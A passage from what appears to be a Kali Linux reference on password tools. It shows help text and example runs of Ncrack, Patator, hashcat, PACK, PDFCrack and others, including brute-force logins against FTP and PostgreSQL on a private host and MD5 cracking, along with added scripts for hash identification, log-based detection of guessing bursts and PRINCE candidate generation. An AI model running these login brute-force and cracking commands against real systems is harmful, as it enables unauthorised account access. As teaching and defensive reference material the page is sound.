--no-hashcat Don't print Hashcat Information.
-v, --verbose Turn on debugging logs. -vvv for maximum logs.
--help Show this message and exit.
■ Example
root@kali:~# nth -t '$2a$05$LhayLxezLhK1LhWvKxCyLOj0j1u.Kj0jZ0pEmm134uzrQlFvQJLF6' --no-john --no-banner
$2a$05$LhayLxezLhK1LhWvKxCyLOj0j1u.Kj0jZ0pEmm134uzrQlFvQJLF6
Most Likely
bcrypt, HC: 3200
Blowfish(OpenBSD), HC: 3200 Summary: Can be used in Linux Shadow Files.
Woltlab Burning Board 4.x,
root@kali:~# nth -t '$P$984478476IagS59wHZvyQMArzfx58u.' --no-john -g | \
jq '. | to_entries[] | del(.value[].john,.value[].extended,.value[].description) | { (.key): [.value[] | @text "\(.name) ,HC: \(.hashcat)"] }'
{
"$P$984478476IagS59wHZvyQMArzfx58u.": [
"Wordpress ≥ v2.6.2 ,HC: 400",
"Joomla ≥ v2.5.18 ,HC: 400",
"PHPass' Portable Hash ,HC: 400"
]
}
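hashID and Name That Hash both work from the shape of the string: a `$prefix$` tag is decisive, a bare hex string is only a length and therefore ambiguous (32 hex characters is MD5, NTLM or MD4). The block below is an added example for this page, not hashID's or nth's code, that implements that triage for the formats that appear on this page, maps each to its hashcat mode and John format, and applies it to /etc/shadow lines the way the John example above required (yescrypt has no hashcat mode, so John's --format=crypt is the only route). The shadow lines are constructed: the hash fields are placeholders with the right shape and will not crack to anything.

```python
import re
from typing import List, NamedTuple, Optional, Tuple


class Guess(NamedTuple):
    name: str
    hashcat: Optional[int]   # None = no hashcat mode for this format
    john: str


# Added example for this page; it is not hashID's or Name That Hash's code.
# Tagged formats are checked first; bare hex falls back to a length table.
_TAGGED = [
    (re.compile(r"^\$P\$[./0-9A-Za-z]{31}$"), [Guess("phpass (WordPress)", 400, "phpass")]),
    (re.compile(r"^\$H\$[./0-9A-Za-z]{31}$"), [Guess("phpass (phpBB3)", 400, "phpass")]),
    (re.compile(r"^\$2[abxy]\$\d{2}\$[./0-9A-Za-z]{53}$"), [Guess("bcrypt", 3200, "bcrypt")]),
    (re.compile(r"^\$1\$[^$]{1,8}\$[./0-9A-Za-z]{22}$"), [Guess("md5crypt", 500, "md5crypt")]),
    (re.compile(r"^\$5\$(rounds=\d+\$)?[^$]{1,16}\$[./0-9A-Za-z]{43}$"),
     [Guess("sha256crypt", 7400, "sha256crypt")]),
    (re.compile(r"^\$6\$(rounds=\d+\$)?[^$]{1,16}\$[./0-9A-Za-z]{86}$"),
     [Guess("sha512crypt", 1800, "sha512crypt")]),
    (re.compile(r"^\$y\$[^$]+\$[^$]+\$[./0-9A-Za-z]+$"), [Guess("yescrypt", None, "crypt")]),
]
_MYSQL41 = re.compile(r"^\*[0-9A-F]{40}$")
_HEX = {
    16: [Guess("MySQL323", 200, "mysql"), Guess("LM", 3000, "LM")],
    32: [Guess("MD5", 0, "raw-md5"), Guess("NTLM", 1000, "NT"), Guess("MD4", 900, "raw-md4")],
    40: [Guess("SHA-1", 100, "raw-sha1")],
    64: [Guess("SHA-256", 1400, "raw-sha256")],
    128: [Guess("SHA-512", 1700, "raw-sha512")],
}


def identify(h: str) -> List[Guess]:
    """Candidate formats in order of likelihood; empty when nothing matches."""
    h = h.strip()
    for pattern, guesses in _TAGGED:
        if pattern.match(h):
            return list(guesses)
    if _MYSQL41.match(h):
        return [Guess("MySQL4.1/MySQL5", 300, "mysql-sha1")]
    if re.fullmatch(r"[0-9a-fA-F]+", h):
        return list(_HEX.get(len(h), []))
    return []


class ShadowEntry(NamedTuple):
    user: str
    hash: str
    status: str          # "hash", "locked" or "nopass"


def parse_shadow(text: str) -> List[ShadowEntry]:
    """Read /etc/shadow lines; a field starting with '!' or '*' is a locked account."""
    entries = []
    for line in text.splitlines():
        if not line.strip() or line.startswith("#"):
            continue
        user, field = line.split(":")[:2]
        if field == "":
            status = "nopass"
        elif field.startswith(("!", "*")):
            status = "locked"
        else:
            status = "hash"
        entries.append(ShadowEntry(user, field, status))
    return entries


def triage_shadow(text: str) -> List[Tuple[str, str, List[str]]]:
    """Per account: user, status, and the candidate hash types (empty unless crackable)."""
    rows = []
    for e in parse_shadow(text):
        names = [g.name for g in identify(e.hash)] if e.status == "hash" else []
        rows.append((e.user, e.status, names))
    return rows


# Constructed sample (not from a real system); hash fields are placeholders.
SAMPLE_SHADOW = "\n".join([
    "root:*:20015:0:99999:7:::",
    "daemon:!:20015:0:99999:7:::",
    "hello:$y$j9T$abcdefghijklmnop$" + "Z" * 43 + ":20015:0:99999:7:::",
    "legacy:$6$rounds=5000$saltsalt$" + "A" * 86 + ":20015:0:99999:7:::",
])

if __name__ == "__main__":
    for g in identify("$P$BjlfCiZ7mwif9qwdfpsfDGn5C9tR4I0"):
        print(g)                                   # phpass, hashcat 400, john phpass
    for row in triage_shadow(SAMPLE_SHADOW):
        print(row)
```

The practical caveat is the ambiguous case: a 32-hex hash from a Windows SAM dump is NTLM (-m 1000), the same string from a PHP application is probably MD5 (-m 0), and only the source tells them apart. hashcat 6.2.6 also has `--identify` for the same purpose; it and the tools above are a starting point, not a verdict.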
Ncrack
Brute-forces login authentication for HTTP, SMB, SSH, FTP, POP3, IMAP, relational databases and more.
■ Usage
root@kali:~# ncrack --help
Usage: ncrack [Options] {target and service specification}
TARGET SPECIFICATION:
Can pass hostnames, IP addresses, networks, etc.
Ex: scanme.nmap.org, microsoft.com/24, 192.168.0.1; 10.0.0-255.1-254
-iX <inputfilename>: Input from Nmap's -oX XML output format
-iN <inputfilename>: Input from Nmap's -oN Normal output format
-iL <inputfilename>: Input from list of hosts/networks
--exclude <host1[,host2][,host3],...>: Exclude hosts/networks
--excludefile <exclude_file>: Exclude list from file
SERVICE SPECIFICATION:
Can pass target specific services in <service>://target (standard) notation or
using -p which will be applied to all hosts in non-standard notation.
Service arguments can be specified to be host-specific, type of service-specific
(-m) or global (-g). Ex: ssh://10.0.0.10,at=10,cl=30 -m ssh:at=50 -g cd=3000
Ex2: ncrack -p ssh,ftp:3500,25 10.0.0.10 scanme.nmap.org google.com:80,ssl
-p <service-list>: services will be applied to all non-standard notation hosts
-m <service>:<options>: options will be applied to all services of this type
-g <options>: options will be applied to every service globally
Misc options:
ssl: enable SSL over this service
path <name>: used in modules like HTTP ('=' needs escaping if used)
db <name>: used in modules like MongoDB to specify the database
domain <name>: used in modules like WinRM to specify the domain
TIMING AND PERFORMANCE:
Options which take <time> are in seconds, unless you append 'ms'
(milliseconds), 'm' (minutes), or 'h' (hours) to the value (e.g. 30m).
Service-specific options:
cl (min connection limit): minimum number of concurrent parallel connections
CL (max connection limit): maximum number of concurrent parallel connections
at (authentication tries): authentication attempts per connection
cd (connection delay): delay <time> between each connection initiation
cr (connection retries): caps number of service connection attempts
to (time-out): maximum cracking <time> for service, regardless of success so far
-T<0-5>: Set timing template (higher is faster)
--connection-limit <number>: threshold for total concurrent connections
--stealthy-linear: try credentials using only one connection against each specified host
until you hit the same host again. Overrides all other timing options.
AUTHENTICATION:
-U <filename>: username file
-P <filename>: password file
--user <username_list>: comma-separated username list
--pass <password_list>: comma-separated password list
--passwords-first: Iterate password list for each username. Default is opposite.
--pairwise: Choose usernames and passwords in pairs.
OUTPUT:
-oN/-oX <file>: Output scan in normal and XML format, respectively, to the given filename.
-oA <basename>: Output in the two major formats at once
-v: Increase verbosity level (use twice or more for greater effect)
-d[level]: Set or increase debugging level (Up to 10 is meaningful)
--nsock-trace <level>: Set nsock trace level (Valid range: 0 - 10)
--log-errors: Log errors/warnings to the normal-format output file
--append-output: Append to rather than clobber specified output files
MISC:
--resume <file>: Continue previously saved session
--save <file>: Save restoration file with specific filename
-f: quit cracking service after one found credential
-6: Enable IPv6 cracking
-sL or --list: only list hosts and services
--datadir <dirname>: Specify custom Ncrack data file location
--proxy <type://proxy:port>: Make connections via socks4, 4a, http.
-V: Print version number
-h: Print this help summary page.
MODULES:
SSH, RDP, FTP, Telnet, HTTP(S), Wordpress, POP3(S), IMAP, CVS, SMB, VNC, SIP, Redis, PostgreSQL, MQTT, MySQL, MSSQL, MongoDB, Cassandra, WinRM, OWA, DICOM
■ Example usage
root@kali:~# ncrack -v -f -U users.txt -P passwords.txt ftp://192.168.11.4
Starting Ncrack 0.7 ( http://ncrack.org ) at 2024-10-28 03:13 UTC
Discovered credentials on ftp://192.168.11.4:21 'hello' 'hello'
ftp://192.168.11.4:21 finished.
Discovered credentials for ftp on 192.168.11.4 21/tcp:
192.168.11.4 21/tcp ftp: 'hello' 'hello'
Ncrack done: 1 service scanned in 3.03 seconds.
Probes sent: 1 | timed-out: 0 | prematurely-closed: 0
Ncrack finished.
PACK
A toolkit for password analysis.
■ Usage
root@kali:~# statsgen --help
Usage: statsgen [options] passwords.txt
Type --help for more options
Options:
--version show program's version number and exit
-h, --help show this help message and exit
-o password.masks, --output=password.masks
Save masks and stats to a file
--hiderare Hide statistics covering less than 1% of the sample
-q, --quiet Don't show headers.
Password Filters:
--minlength=8 Minimum password length
--maxlength=8 Maximum password length
--charset=loweralpha,numeric
Password charset filter (comma separated)
--simplemask=stringdigit,allspecial
Password mask filter (comma separated)
root@kali:~# maskgen --help
Usage: maskgen pass0.masks [pass1.masks ...] [options]
Options:
--version show program's version number and exit
-h, --help show this help message and exit
-t 86400, --targettime=86400
Target time of all masks (seconds)
-o masks.hcmask, --outputmasks=masks.hcmask
Save masks to a file
--showmasks Show matching masks
Individual Mask Filter Options:
--minlength=8 Minimum password length
--maxlength=8 Maximum password length
--mintime=3600 Minimum mask runtime (seconds)
--maxtime=3600 Maximum mask runtime (seconds)
--mincomplexity=1 Minimum complexity
--maxcomplexity=100
Maximum complexity
--minoccurrence=1 Minimum occurrence
--maxoccurrence=100
Maximum occurrence
Mask Sorting Options:
--optindex sort by mask optindex (default)
--occurrence sort by mask occurrence
--complexity sort by mask complexity
Check mask coverage:
--checkmasks=?u?l?l?l?l?l?d,?l?l?l?l?l?d?d
check mask coverage
--checkmasksfile=masks.hcmask
check mask coverage in a file
Miscellaneous options:
--pps=1000000000 Passwords per Second
-q, --quiet Don't show headers.
root@kali:~# policygen --help
Usage: policygen [options]
Type --help for more options
Options:
--version show program's version number and exit
-h, --help show this help message and exit
-o masks.hcmask, --outputmasks=masks.hcmask
Save masks to a file
--pps=1000000000 Passwords per Second
--showmasks Show matching masks
--noncompliant Generate masks for noncompliant passwords
-q, --quiet Don't show headers.
Password Policy:
Define the minimum (or maximum) password strength policy that you
would like to test
--minlength=8 Minimum password length
--maxlength=8 Maximum password length
--mindigit=1 Minimum number of digits
--minlower=1 Minimum number of lower-case characters
--minupper=1 Minimum number of upper-case characters
--minspecial=1 Minimum number of special characters
--maxdigit=3 Maximum number of digits
--maxlower=3 Maximum number of lower-case characters
--maxupper=3 Maximum number of upper-case characters
--maxspecial=3 Maximum number of special characters
root@kali:~# rulegen --help
Usage: rulegen [options] passwords.txt
Options:
--version show program's version number and exit
-h, --help show this help message and exit
-b rockyou, --basename=rockyou
Output base name. The following files will be
generated: basename.words, basename.rules and
basename.stats
-w wiki.dict, --wordlist=wiki.dict
Use a custom wordlist for rule analysis.
-q, --quiet Don't show headers.
--threads=THREADS Parallel threads to use for processing.
Fine tune source word generation::
--maxworddist=10 Maximum word edit distance (Levenshtein)
--maxwords=5 Maximum number of source word candidates to consider
--morewords Consider suboptimal source word candidates
--simplewords Generate simple source words for given passwords
Fine tune rule generation::
--maxrulelen=10 Maximum number of operations in a single rule
--maxrules=5 Maximum number of rules to consider
--morerules Generate suboptimal rules
--simplerules Generate simple rules insert,delete,replace
--bruterules Bruteforce reversal and rotation rules (slow)
Fine tune spell checker engine::
--providers=aspell,myspell
Comma-separated list of provider engines
Debuggin options::
-v, --verbose Show verbose information.
-d, --debug Debug rules.
--password Process the last argument as a password not a file.
--word=Password Use a custom word for rule analysis
--hashcat Test generated rules with hashcat-cli
■ Example usage
# Generate masks from a password list
root@kali:~# statsgen 2023-200_most_used_passwords.txt -o most_used_passwords.masks --hiderare -q
[*] Analyzing passwords in [2023-200_most_used_passwords.txt]
[*] Saving advanced masks and occurrences to [most_used_passwords.masks]
[+] Analyzing 100% (200/200) of passwords
[*] Statistics below is relative to the number of analyzed passwords, not total number of passwords
[*] Length:
[+] 8: 32% (65)
[+] 6: 18% (37)
[+] 9: 16% (33)
[+] 10: 10% (20)
[+] 7: 06% (12)
[...]
[*] Character-set:
[+] numeric: 31% (62)
[+] loweralphanum: 26% (52)
[+] loweralpha: 18% (37)
[+] mixedalphanum: 09% (18)
[+] all: 09% (18)
[...]
[*] Simple Masks:
[+] digit: 31% (62)
[+] stringdigit: 23% (46)
[+] string: 21% (43)
[+] stringspecialdigit: 07% (14)
[+] digitstring: 06% (13)
[...]
[*] Advanced Masks:
[+] ?d?d?d?d?d?d: 10% (21)
[+] ?d?d?d?d?d?d?d?d: 05% (10)
[+] ?d?d?d?d?d?d?d?d?d?d: 04% (9)
[+] ?d?d?d?d?d?d?d?d?d: 04% (8)
[+] ?l?l?l?l?l?l?l?l: 04% (8)
[...]
# Sort the masks by occurrence count, keep only enough of them for a total run time of about one hour, and write them as a Hashcat mask file
root@kali:~# maskgen most_used_passwords.masks --occurrence --targettime 3600 -o most_used_passwords.hcmask --showmasks -q
[*] Analyzing masks in [most_used_passwords.masks]
[*] Saving generated masks to [most_used_passwords.hcmask]
[*] Using 1,000,000,000 keys/sec for calculations.
[*] Sorting masks by their [occurrence].
[L:] Mask: [ Occ: ] [ Time: ]
[ 6] ?d?d?d?d?d?d [21 ] [ 0:00:00]
[ 8] ?d?d?d?d?d?d?d?d [10 ] [ 0:00:00]
[10] ?d?d?d?d?d?d?d?d?d?d [9 ] [ 0:00:10]
[ 9] ?d?d?d?d?d?d?d?d?d [8 ] [ 0:00:01]
[ 8] ?l?l?l?l?l?l?l?l [8 ] [ 0:03:28]
[...]
# Crack an MD5-hashed password with the generated masks
root@kali:~# echo -n "password" | md5sum | cut -d' ' -f1 > password.txt
root@kali:~# hashcat -a 3 -m 0 password.txt most_used_passwords.hcmask
hashcat (v6.2.6) starting
OpenCL API (OpenCL 3.0 PoCL 6.0+debian Linux, None+Asserts, RELOC, LLVM 17.0.6, SLEEF, DISTRO, POCL_DEBUG) - Platform #1 [The pocl project]
============================================================================================================================================
* Device #1: cpu-haswell-Intel(R) Core(TM) i7-8565U CPU @ 1.80GHz, 2889/5842 MB (1024 MB allocatable), 8MCU
[...]
Session..........: hashcat
Status...........: Exhausted
Hash.Mode........: 0 (MD5)
Hash.Target......: 5f4dcc3b5aa765d61d8327deb882cf99
Time.Started.....: Fri Nov 1 03:09:23 2024 (0 secs)
Time.Estimated...: Fri Nov 1 03:09:23 2024 (0 secs)
Kernel.Feature...: Pure Kernel
Guess.Mask.......: ?d?d?d?d?d?d [6]
[...]
Session..........: hashcat
Status...........: Exhausted
Hash.Mode........: 0 (MD5)
Hash.Target......: 5f4dcc3b5aa765d61d8327deb882cf99
Time.Started.....: Fri Nov 1 03:09:24 2024 (57 secs)
Time.Estimated...: Fri Nov 1 03:10:21 2024 (0 secs)
Kernel.Feature...: Pure Kernel
Guess.Mask.......: ?d?d?d?d?d?d?d?d?d?d [10]
[...]
Session..........: hashcat
Status...........: Exhausted
Hash.Mode........: 0 (MD5)
Hash.Target......: 5f4dcc3b5aa765d61d8327deb882cf99
Time.Started.....: Fri Nov 1 03:10:21 2024 (6 secs)
Time.Estimated...: Fri Nov 1 03:10:27 2024 (0 secs)
Kernel.Feature...: Pure Kernel
Guess.Mask.......: ?d?d?d?d?d?d?d?d?d [9]
[...]
Session..........: hashcat
Status...........: Exhausted
Hash.Mode........: 0 (MD5)
Hash.Target......: 5f4dcc3b5aa765d61d8327deb882cf99
Time.Started.....: Fri Nov 1 03:09:23 2024 (1 sec)
Time.Estimated...: Fri Nov 1 03:09:24 2024 (0 secs)
Kernel.Feature...: Pure Kernel
Guess.Mask.......: ?d?d?d?d?d?d?d?d [8]
[...]
5f4dcc3b5aa765d61d8327deb882cf99:password
Session..........: hashcat
Status...........: Cracked
Hash.Mode........: 0 (MD5)
Hash.Target......: 5f4dcc3b5aa765d61d8327deb882cf99
Time.Started.....: Fri Nov 1 03:10:27 2024 (2 secs)
Time.Estimated...: Fri Nov 1 03:10:29 2024 (0 secs)
Kernel.Feature...: Pure Kernel
Guess.Mask.......: ?l?l?l?l?l?l?l?l [8]
[...]
# Generate password rules and a word list from the password list
root@kali:~# rulegen 2023-200_most_used_passwords.txt -b most_used_passwords -q
[*] Using Enchant 'aspell' module. For best results please install
'aspell' module language dictionaries.
[*] Analyzing passwords file: 2023-200_most_used_passwords.txt:
[...]
[*] Top 10 rules
[+] : - 24 (1.78%)
[+] $1 $2 $3 - 9 (0.67%)
[+] $@ $1 $2 $3 - 8 (0.59%)
[+] i4@ i51 i62 o73 - 6 (0.44%)
[+] $1 - 5 (0.37%)
[+] o2c se1 $2 $3 $4 - 4 (0.30%)
[+] o2c i41 se2 $3 $4 - 4 (0.30%)
[+] o2c i41 i52 se3 $4 - 4 (0.30%)
[+] o2c i41 i52 i63 o74 - 4 (0.30%)
[+] ss@ $1 $2 $3 - 4 (0.30%)
[*] Top 10 words
[+] admin - 8 (0.59%)
[+] Password - 8 (0.59%)
[+] qwerty - 8 (0.59%)
[+] admins - 8 (0.59%)
[+] Aah - 6 (0.44%)
[+] ab - 5 (0.37%)
[+] ac - 5 (0.37%)
[+] arc - 4 (0.30%)
[+] abs - 4 (0.30%)
[+] password - 4 (0.30%)
# Crack an MD5-hashed password with the generated rules and word list
root@kali:~# echo -n "password123" | md5sum | cut -d' ' -f1 > password.txt
root@kali:~# hashcat -a 0 -m 0 password.txt most_used_passwords-sorted.word -r most_used_passwords-sorted.rule
hashcat (v6.2.6) starting
OpenCL API (OpenCL 3.0 PoCL 6.0+debian Linux, None+Asserts, RELOC, LLVM 17.0.6, SLEEF, DISTRO, POCL_DEBUG) - Platform #1 [The pocl project]
============================================================================================================================================
* Device #1: cpu-haswell-Intel(R) Core(TM) i7-8565U CPU @ 1.80GHz, 2889/5842 MB (1024 MB allocatable), 8MCU
[...]
482c811da5d5b4bc6d497ffa98491e38:password123
Session..........: hashcat
Status...........: Cracked
Hash.Mode........: 0 (MD5)
Hash.Target......: 482c811da5d5b4bc6d497ffa98491e38
Time.Started.....: Fri Nov 1 04:03:57 2024 (0 secs)
Time.Estimated...: Fri Nov 1 04:03:57 2024 (0 secs)
Kernel.Feature...: Pure Kernel
Guess.Base.......: File (most_used_passwords-sorted.word)
Guess.Mod........: Rules (most_used_passwords-sorted.rule)
[...]
Patator
A multi-purpose brute-force attack tool.
■ Usage
root@kali:~# patator --help
Available modules:
+ ftp_login : Brute-force FTP
+ ssh_login : Brute-force SSH
+ telnet_login : Brute-force Telnet
+ smtp_login : Brute-force SMTP
+ smtp_vrfy : Enumerate valid users using SMTP VRFY
+ smtp_rcpt : Enumerate valid users using SMTP RCPT TO
+ finger_lookup : Enumerate valid users using Finger
+ http_fuzz : Brute-force HTTP
+ rdp_gateway : Brute-force RDP Gateway
+ ajp_fuzz : Brute-force AJP
+ pop_login : Brute-force POP3
+ pop_passd : Brute-force poppassd (http://netwinsite.com/poppassd/)
+ imap_login : Brute-force IMAP4
+ ldap_login : Brute-force LDAP
+ dcom_login : Brute-force DCOM
+ smb_login : Brute-force SMB
+ smb_lookupsid : Brute-force SMB SID-lookup
+ rlogin_login : Brute-force rlogin
+ vmauthd_login : Brute-force VMware Authentication Daemon
+ mssql_login : Brute-force MSSQL
+ oracle_login : Brute-force Oracle
+ mysql_login : Brute-force MySQL
+ mysql_query : Brute-force MySQL queries
+ rdp_login : Brute-force RDP (NLA)
+ pgsql_login : Brute-force PostgreSQL
+ vnc_login : Brute-force VNC
+ dns_forward : Forward DNS lookup
+ dns_reverse : Reverse DNS lookup
+ snmp_login : Brute-force SNMP v1/2/3
+ ike_enum : Enumerate IKE transforms
+ unzip_pass : Brute-force the password of encrypted ZIP files
+ keystore_pass : Brute-force the password of Java keystore files
+ sqlcipher_pass : Brute-force the password of SQLCipher-encrypted databases
+ umbraco_crack : Crack Umbraco HMAC-SHA1 password hashes
+ tcp_fuzz : Fuzz TCP services
+ dummy_test : Testing module
■ Example usage
root@kali:~# patator pgsql_login host=192.168.11.4 user=FILE0 password=FILE1 0=usernames.txt 1=passwords.txt -x ignore:fgrep='password authentication failed for user' --rate-limit=1 --threads=20
12:28:44 patator INFO - Starting Patator 1.1-dev (https://github.com/lanjelot/patator) with python-3.12.6 at 2024-11-01 12:28 UTC
12:28:44 patator INFO -
12:28:44 patator INFO - code size time | candidate | num | mesg
12:28:44 patator INFO - -----------------------------------------------------------------------------
12:29:17 patator INFO - 0 2 0.012 | admin:admin123 | 624 | OK
12:29:27 patator INFO - 0 2 0.018 | admin2:admin123 | 826 | OK
12:46:27 patator INFO - 0 2 0.017 | guest:password | 21015 | OK
13:01:55 patator INFO - 0 2 0.009 | postgres:postgres | 39389 | OK
13:17:14 patator INFO - 0 2 0.012 | test:password | 57577 | OK
13:26:15 patator INFO - Hits/Done/Skip/Fail/Size: 5/68276/0/0/68276, Avg: 19 r/s, Time: 0h 57m 30s
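The server-side view of the pgsql_login run above, as an added example (not Patator's or PostgreSQL's code): PostgreSQL logs each rejected guess as the "password authentication failed for user" message the run filters on, so counting those per client over a sliding window flags the burst. The log_line_prefix, the threshold and the log excerpt are assumptions constructed for this example.

```python
"""Added example, not Patator's or PostgreSQL's code: find password-guessing
bursts like the pgsql_login run above in PostgreSQL server logs, counting the
'password authentication failed' message per client over a sliding window."""
import re
from collections import defaultdict, deque
from datetime import datetime, timedelta

# Assumed log_line_prefix '%m [%p] %u@%d %h ' in front of the server message;
# adjust LINE to the prefix actually configured.
LINE = re.compile(
    r"^(?P<ts>\S+ \S+) \S+ \[\d+\] (?P<user>\S+)@(?P<db>\S+) (?P<host>[\d.]+) "
    r"(?P<level>FATAL|LOG):\s+(?P<msg>.*)$")
FAILED = "password authentication failed for user"


def parse(line):
    """Structured event for one log line, or None if the prefix does not match."""
    m = LINE.match(line)
    if not m:
        return None
    ev = m.groupdict()
    ev["ts"] = datetime.strptime(ev["ts"], "%Y-%m-%d %H:%M:%S.%f")
    return ev


def detect_guessing(log_text, threshold=5, window=timedelta(seconds=60)):
    """One alert per client host that produced >= threshold failed password
    logins inside a sliding window. A later successful connection from an
    alerted host is recorded too, since that is what a hit such as
    'admin:admin123 OK' looks like from the server side."""
    recent = defaultdict(deque)   # host -> timestamps of failures still in window
    users = defaultdict(set)      # host -> usernames tried
    alerts = {}
    for line in log_text.splitlines():
        ev = parse(line)
        if ev is None:
            continue
        host = ev["host"]
        if ev["msg"].startswith(FAILED):
            q = recent[host]
            q.append(ev["ts"])
            users[host].add(ev["user"])
            while q and ev["ts"] - q[0] > window:
                q.popleft()
            if len(q) >= threshold and host not in alerts:
                alerts[host] = {"first_seen": q[0], "failures": len(q),
                                "users": sorted(users[host]), "later_success": []}
        elif ev["msg"].startswith("connection authorized") and host in alerts:
            alerts[host]["later_success"].append(ev["user"])
    return alerts


# Constructed log excerpt: eight failures from one client within three seconds
# (the guessing tool), one later success from it, and one unrelated failure.
SAMPLE_LOG = "\n".join(
    [f"2024-11-01 12:28:{44 + i // 3:02d}.{(i % 3) * 333:03d} UTC [41{i:02d}] "
     f'{u}@postgres 192.168.11.3 FATAL:  {FAILED} "{u}"'
     for i, u in enumerate(["admin", "admin", "guest", "postgres",
                            "test", "admin", "guest", "postgres"])]
    + ["2024-11-01 12:29:17.120 UTC [4200] admin@postgres 192.168.11.3 LOG:  "
       "connection authorized: user=admin database=postgres",
       "2024-11-01 12:40:01.000 UTC [4300] alice@postgres 192.168.11.10 FATAL:  "
       f'{FAILED} "alice"'])

if __name__ == "__main__":
    for host, a in detect_guessing(SAMPLE_LOG).items():
        print(f"[!] {host}: {a['failures']} failures from {a['first_seen']}, "
              f"users {a['users']}, later success as {a['later_success']}")
```

At the 19 requests per second the run above averaged, the threshold trips within the first second; a run throttled to one attempt every few seconds needs a longer window than the 60 s used here.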
PDFCrack
Finds the password of a password-protected PDF file.
■ Usage
root@kali:~# pdfcrack
Usage: pdfcrack -f filename [OPTIONS]
OPTIONS:
-b, --bench perform benchmark and exit
-c, --charset=STRING Use the characters in STRING as charset
-w, --wordlist=FILE Use FILE as source of passwords to try
-n, --minpw=INTEGER Skip trying passwords shorter than this
-m, --maxpw=INTEGER Stop when reaching this passwordlength
-l, --loadState=FILE Continue from the state saved in FILENAME
-o, --owner Work with the ownerpassword
-u, --user Work with the userpassword (default)
-p, --password=STRING Give userpassword to speed up breaking
ownerpassword (implies -o)
-q, --quiet Run quietly
-s, --permutate Try permutating the passwords (currently only
supports switching first character to uppercase)
-v, --version Print version and exit
■ Example usage
root@kali:~# pdfcrack -f sample.pdf -w passwords.txt
PDF version 1.7
Security Handler: Standard
V: 2
R: 3
P: -3392
Length: 128
Encrypted Metadata: True
FileID: 7d422a8836bbb2110a0067458b6bc623
U: 02c65c4c0d2f0ada15776dfde8cf416700000000000000000000000000000000
O: 71638af5d20eac2561e2a5fc84d77b73920585281473e90018fcff35671afabe
found user-password: 'hello'
Pipal
Analyzes a password list and shows trends, such as which kinds of passwords are most common.
■ Usage
root@kali:~# pipal --help
Usage: pipal [OPTION] ... FILENAME
--help, -h, -?: show help
--top, -t X: show the top X results (default 10)
--output, -o <filename>: output to file
--gkey <Google Maps API key>: to allow zip code lookups (optional)
--list-checkers: Show the available checkers and which are enabled
--verbose, -v: Verbose
■ Example usage
root@kali:~# pipal rockyou.txt
Generating stats, hit CTRL-C to finish early and dump stats on words already processed.
Please wait...
[...]
Basic Results
Total entries = 14344162
Total unique entries = 14343689
Top 10 passwords
love = 4 (0.0%)
1234567 = 3 (0.0%)
butterfly = 3 (0.0%)
[...]
Top 10 base words
love = 9829 (0.07%)
angel = 4845 (0.03%)
june = 4347 (0.03%)
[...]
Password length (count ordered)
8 = 2967049 (20.68%)
7 = 2507218 (17.48%)
9 = 2191547 (15.28%)
[...]
One to six characters = 2230094 (15.55%)
One to eight characters = 7704361 (53.71%)
More than eight characters = 6639801 (46.29%)
Only lowercase alpha = 3726656 (25.98%)
Only uppercase alpha = 229893 (1.6%)
Only alpha = 3956549 (27.58%)
Only numeric = 2346842 (16.36%)
First capital last symbol = 38828 (0.27%)
First capital last number = 653713 (4.56%)
Single digit on the end = 1180546 (8.23%)
Two digits on the end = 2059621 (14.36%)
Three digits on the end = 865023 (6.03%)
[...]
Character sets
loweralphanum: 6075055 (42.35%)
loweralpha: 3726656 (25.98%)
numeric: 2346842 (16.36%)
upperalphanum: 407436 (2.84%)
[...]
princeprocessor
Generates a password list using the PRINCE (PRobability INfinite Chained Elements) password-guessing algorithm.
■ Usage
root@kali:~# princeprocessor --help
Usage: princeprocessor [options] [<] wordlist
* Startup:
-V, --version Print version
-h, --help Print help
* Misc:
--keyspace Calculate number of combinations
* Optimization:
--pw-min=NUM Print candidate if length is greater than NUM
--pw-max=NUM Print candidate if length is smaller than NUM
--elem-cnt-min=NUM Minimum number of elements per chain
--elem-cnt-max=NUM Maximum number of elements per chain
--wl-dist-len Calculate output length distribution from wordlist
--wl-max=NUM Load only NUM words from input wordlist or use 0 to disable
-c, --dupe-check-disable Disable dupes check for faster initial load
--save-pos-disable Save the position for later resume with -s
* Resources:
-s, --skip=NUM Skip NUM passwords from start (for distributed)
-l, --limit=NUM Limit output to NUM passwords (for distributed)
* Files:
-o, --output-file=FILE Output-file
* Amplifier:
--case-permute For each word in the wordlist that begins with a letter
generate a word with the opposite case of the first letter
■ Example usage
root@kali:~# echo -e "hello\nworld\n1234" | princeprocessor --elem-cnt-max 2
hello
world
1234
12341234
1234hello
1234world
hello1234
world1234
hellohello
worldhello
helloworld
worldworld
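What the run above does, as an added example that is not princeprocessor's own code: a simplified PRINCE generator that chains wordlist elements under the --elem-cnt-min/--elem-cnt-max and --pw-min/--pw-max limits and counts the --keyspace. Its output order differs slightly from princeprocessor's, and the default limits are this example's own, but for the page's three-word input it yields the same twelve candidates.

```python
"""Added example, not princeprocessor's own code: a simplified PRINCE
(PRobability INfinite Chained Elements) generator."""


def _chains(words, count, pw_max, prefix=""):
    """All concatenations of exactly count elements, pruning any chain that
    already exceeds pw_max so longer wordlists do not explode."""
    if count == 0:
        yield prefix
        return
    for w in words:
        if len(prefix) + len(w) <= pw_max:
            yield from _chains(words, count - 1, pw_max, prefix + w)


def prince(words, elem_cnt_min=1, elem_cnt_max=8, pw_min=1, pw_max=16):
    """Yield candidates with fewer elements first and, within one element
    count, shorter outputs first. princeprocessor walks per-length chain
    tables and emits in a slightly different order; the default limits here
    are this example's own, not princeprocessor's."""
    words = list(dict.fromkeys(words))   # drop duplicates, keep input order
    for count in range(elem_cnt_min, elem_cnt_max + 1):
        for cand in sorted(_chains(words, count, pw_max), key=len):
            if len(cand) >= pw_min:
                yield cand


def keyspace(words, elem_cnt_min=1, elem_cnt_max=8):
    """Number of chains before length filtering (princeprocessor --keyspace)."""
    n = len(set(words))
    return sum(n ** k for k in range(elem_cnt_min, elem_cnt_max + 1))


if __name__ == "__main__":
    # Same input as the run above:
    # echo -e "hello\nworld\n1234" | princeprocessor --elem-cnt-max 2
    for candidate in prince(["hello", "world", "1234"], elem_cnt_max=2):
        print(candidate)
```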
rling
Removes duplicate lines from files such as password lists. It runs faster than the rli command from hashcat-utils.
■ Usage
root@kali:~# rling --help
rling: unrecognized option '--help'
rling version: 1.74 2020/08/24 14:25:43 dlr Exp dlr $
rling - remove matching lines from a file
rling input output [remfil1 remfile2 ...]
-i Ignore any error/missing files on remove list
-d Removes duplicate lines from input (on by default)
-D file Write duplicates to file
-n Do not remove duplicate lines from input
-c Output lines common to input and remove files
-s Sort output. Default is input order.
